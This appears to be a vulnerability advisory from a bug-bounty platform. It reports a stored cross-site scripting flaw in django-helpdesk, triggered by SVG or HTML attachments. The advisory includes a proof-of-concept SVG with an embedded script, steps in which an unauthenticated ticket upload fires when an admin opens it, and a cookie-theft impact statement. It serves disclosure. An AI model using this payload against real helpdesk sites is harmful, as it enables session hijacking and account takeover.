Lucene search

K
huntrNoobpk4D7A5FDD-B2DE-467A-ADE0-3F2FB386638E
HistoryNov 11, 2021 - 2:18 p.m.

Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

2021-11-1114:18:52
noobpk
www.huntr.dev
10
cross-site scripting
stored xss
upload
attachment
svg
html
django-helpdesk
unauthenticated user
admin
impact
cookie theft

EPSS

0.001

Percentile

21.4%

Description

Stored XSS via upload ‘Attachments’ with format .svg or .html

Detail

When opening the attachment, some format files will be rendered and loaded on the browser. So it allows executing arbitrary javascript code that was injected into attachment before.

Proof of Concept

// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Step top Reproduct

Create a ticket with an unauthenticated user

Upload .svg or .html into attachments

The XSS will trigger when the admin open the attachment

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

EPSS

0.001

Percentile

21.4%

Related for 4D7A5FDD-B2DE-467A-ADE0-3F2FB386638E